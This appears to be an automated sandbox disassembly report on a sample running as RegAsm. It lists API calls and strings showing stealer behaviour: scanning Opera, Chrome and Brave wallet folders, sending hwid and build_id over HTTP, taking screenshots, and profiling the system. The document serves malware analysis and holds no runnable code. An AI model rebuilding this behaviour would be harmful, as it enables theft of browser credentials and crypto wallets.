FindFirstFileA.KERNEL32(00000000,?,00427A9B,00427A9A,00000000,?,00427BDC,?,?,00427A97,?,00000000,00000005), ref: 0040D5A4
StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7

Strings

\BraveWallet\Preferences, xrefs: 0040D9E4
Google Chrome, xrefs: 0040DE2B
Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
F, xrefs: 0040E179

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$F$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 2567437900-1653842991
Opcode ID: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction ID: 52dee1824ab0a65af1c6b66960748f4e36746aede80700b1bdbde72769120ff5
Opcode Fuzzy Hash: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction Fuzzy Hash: 32829370900248EADB15EBA5C955BDDBBB86F19304F1040AEF945B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404704
HttpOpenRequestA.WININET(00000000,0152F488,?,01532148,00000000,00000000,-00400100,00000000), ref: 00404745
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040476B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,004201A9,?,?,?,00427895,00000000,004201A9,?,00000000,004201A9,",00000000,004201A9,build_id), ref: 00404A3A
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404A53
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404A64
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A7B
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404ACF
InternetCloseHandle.WININET(00000000), ref: 00404ADA
InternetCloseHandle.WININET(?), ref: 00404AEF
InternetCloseHandle.WININET(00000000), ref: 00404AF9

Strings

!, xrefs: 00404AB5
", xrefs: 0040483F
------, xrefs: 004045FF
", xrefs: 00404987
hwid, xrefs: 00404816
------, xrefs: 004048B9
------, xrefs: 00404771
build_id, xrefs: 0040495E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1585128682-3346224549
Opcode ID: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction ID: 05938b0e318a003ddb6cc0cd5bccca28d8fa4bc8ac54279827d029eeae647f4c
Opcode Fuzzy Hash: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction Fuzzy Hash: 76223F71805149EADB15E7E5C952BEEBBB8AF19304F2440AEF50173182DE782B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 00417800 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00417838
FindFirstFileA.KERNEL32(?,?), ref: 0041784F
StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
wsprintfA.USER32 ref: 004178DB
StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
wsprintfA.USER32 ref: 00417907
PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
lstrcat.KERNEL32(?,0152F608), ref: 00417963
lstrcat.KERNEL32(?,00428720), ref: 00417975
lstrcat.KERNEL32(?,?), ref: 00417983
lstrcat.KERNEL32(?,00428724), ref: 00417995
lstrcat.KERNEL32(?,?), ref: 004179A9

Strings

%s\%s, xrefs: 004178D5
%s\%s, xrefs: 00417920
%s\*, xrefs: 0041782B

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3088078853-445461498
Opcode ID: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction ID: 98b5a54622b645726d4fda38e5423e71ee503b351a3d596aa25196b1fd800074
Opcode Fuzzy Hash: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction Fuzzy Hash: ED81C475900219ABCB10EFA1DC85BEE77B9BF49704F50459EFA09A3181DB385B48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004110A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00410FF0: CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
Part of subcall function 00410FF0: SysAllocString.OLEAUT32(?), ref: 0041101C
Part of subcall function 00410FF0: _wtoi64.MSVCRT ref: 00411062
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(?), ref: 00411078
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(00000000), ref: 0041107B

FileTimeToSystemTime.KERNEL32(0042840C,?,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111C0
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111CC
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4), ref: 004111D3
VariantClear.OLEAUT32(?), ref: 00411217
wsprintfA.USER32 ref: 004111FF

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

Unknown, xrefs: 0041122E
InstallDate, xrefs: 0041119B
Select * From Win32_OperatingSystem, xrefs: 00411137
%d/%d/%d %d:%d:%d, xrefs: 004111F9
ROOT\CIMV2, xrefs: 00411106
Unknown, xrefs: 00411235
WQL, xrefs: 00411144

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 1611285705-2016369993
Opcode ID: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction ID: 2f8da4572961598b54827d09d40e8d86347dea92272749ef862c40ce3fce3f1e
Opcode Fuzzy Hash: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction Fuzzy Hash: 31517C71A01229ABCB24DB95DC49EFFBB7CEF49B10F10411AF605A3290D7789942CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411DF0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 212windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411E2B
GetDesktopWindow.USER32 ref: 00411EC2
GetWindowRect.USER32(00000000,?), ref: 00411ECF
GetDC.USER32(00000000), ref: 00411ED6
CreateCompatibleDC.GDI32(00000000), ref: 00411EDF
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411EF0
SelectObject.GDI32(00000000,00000000), ref: 00411EFB
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411F1B
GlobalFix.KERNEL32(000000FF), ref: 00411F81
GlobalSize.KERNEL32(000000FF), ref: 00411F8E

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00404DD0: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
Part of subcall function 00404DD0: StrCmpCA.SHLWAPI(?,0152F518,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
Part of subcall function 00404DD0: InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07

SelectObject.GDI32(00000000,?), ref: 0041200D
DeleteObject.GDI32(00000000), ref: 0041202B
DeleteObject.GDI32(00000000), ref: 00412032
ReleaseDC.USER32(00000000,00000000), ref: 0041203A
CloseWindow.USER32(00000000), ref: 00412041

Strings

image/jpeg, xrefs: 00411F3D

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 2262162031-3785015651
Opcode ID: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction ID: 2d4e664fba7b2a05d5ee53653e52332fc25948be14a74fdae1dc0a0959ef4bc3
Opcode Fuzzy Hash: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction Fuzzy Hash: F48170B5900209EFDB14DFA4DD45BEEBBB9EF4A704F10412EFA05A3290DB385905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416F50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416F8B
FindFirstFileA.KERNEL32(?,?), ref: 00416FA2
StrCmpCA.SHLWAPI(?,004286D4), ref: 00416FDF
StrCmpCA.SHLWAPI(?,004286D8), ref: 00416FF9
lstrcat.KERNEL32(?,0152F608), ref: 00417037
lstrcat.KERNEL32(?,0152F5C8), ref: 0041704B
lstrcat.KERNEL32(?,?), ref: 0041705F
lstrcat.KERNEL32(?,?), ref: 0041706D
lstrcat.KERNEL32(?,004286DC), ref: 0041707F
lstrcat.KERNEL32(?,?), ref: 00417093
FindNextFileA.KERNEL32(00000000,?), ref: 00417137

Strings

%s\%s, xrefs: 00416F7E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFind$FirstNextwsprintf
String ID: %s\%s
API String ID: 111849568-4073750446
Opcode ID: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction ID: 32a1530b6f6b3f971f2372f18af5ada9a00b89577cc7e7e1cca20f8dd29428d7
Opcode Fuzzy Hash: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction Fuzzy Hash: 7B51E4B1800218ABCB10EBA0CC45BEE777DBF09704F40459EFB05A3181DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B0 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 664fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00000000,00000000,?,\*.*,?,?,00427ACE,00000000,?,00000005), ref: 0040B242
StrCmpCA.SHLWAPI(?,00427D0C), ref: 0040B2CC
StrCmpCA.SHLWAPI(?,00427D10), ref: 0040B2E6
StrCmpCA.SHLWAPI(00000000,Opera,00427ADB,00427ADA,00427AD7,00427AD6,00427AD3,00427AD2,00427ACF), ref: 0040B37B
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040B393
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040B3AB

Strings

Opera Crypto, xrefs: 0040B39D
Opera GX, xrefs: 0040B385
\*.*, xrefs: 0040B1F9
Opera, xrefs: 0040B36A
;, xrefs: 0040BB28

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: ;$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1922906172
Opcode ID: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction ID: 9690fecaf8c131b8b47e39c0c5a29481523bcde2650c36add3c71b8764175778
Opcode Fuzzy Hash: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction Fuzzy Hash: 0F524E30915248EACB15EBA5C955BDDBBB45F19304F5040BEE905B32C2EF781B4CCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 810fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00424344,?,004020E0,?,00424340,?,00000000,00000000,?,00000000), ref: 00401466
StrCmpCA.SHLWAPI(?,00424348), ref: 004014EC
StrCmpCA.SHLWAPI(?,0042434C), ref: 00401506

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

&, xrefs: 00401D81
\*.*, xrefs: 00401362
@6, xrefs: 00401951, 00401954

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstFolderPathlstrcat
String ID: &$\*.*$ @6
API String ID: 2051144152-2842159198
Opcode ID: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction ID: 44408c539f998d041f733f93c1a77994a807b49ce5d211e6c2eeeb93df41b793
Opcode Fuzzy Hash: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction Fuzzy Hash: 0A725D70811288EACB15E7A5C955BDDBBB85F29308F5440AEE905732C2DF781B4CCB7A

Uniqueness

Uniqueness Score: -1.00%

Function 19C34CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19C34EE1

Strings

exclusive, xrefs: 19C34E81
winOpen, xrefs: 19C35110
delayed %dms for lock/sharing conflict at line %d, xrefs: 19C34FB5
psow, xrefs: 19C351F5

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: cda18950d32c97c474f749d47eeeffbd93cc87e6d547b7ea6311cfa08e745689
Instruction ID: a64aab88763a6c31f6ce6da68eab6f1a6cd6da136283b7126d2b4f698aaae95c
Opcode Fuzzy Hash: cda18950d32c97c474f749d47eeeffbd93cc87e6d547b7ea6311cfa08e745689
Instruction Fuzzy Hash: D4F1F472E04391DFD7049F34E88971BB7E8BB58746F884929F88AC62C1D731DA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00416BB0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 180stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416C29
memset.MSVCRT ref: 00416C4E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00416C57
lstrcpy.KERNEL32(?,00000000), ref: 00416C76
lstrcpy.KERNEL32(?,00000000), ref: 00416C94
lstrcpy.KERNEL32(?,00000000), ref: 00416CB7
lstrlen.KERNEL32(00000000), ref: 00416D21

Strings

%DRIVE_FIXED%, xrefs: 00416C9B
*%DRIVE_REMOVABLE%*, xrefs: 00416BFA
*%DRIVE_FIXED%*, xrefs: 00416BD4
%DRIVE_REMOVABLE%, xrefs: 00416C7D

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 1884655365-147700698
Opcode ID: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction ID: fe13885b78f3290ecd7d39ef56567dba2d5f472473329e8ca487ae6efe04297a
Opcode Fuzzy Hash: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction Fuzzy Hash: 74619071600244ABDB31EF61CC45FEE7769EF05704F60412EBA1967182DF7C6A88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004103D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
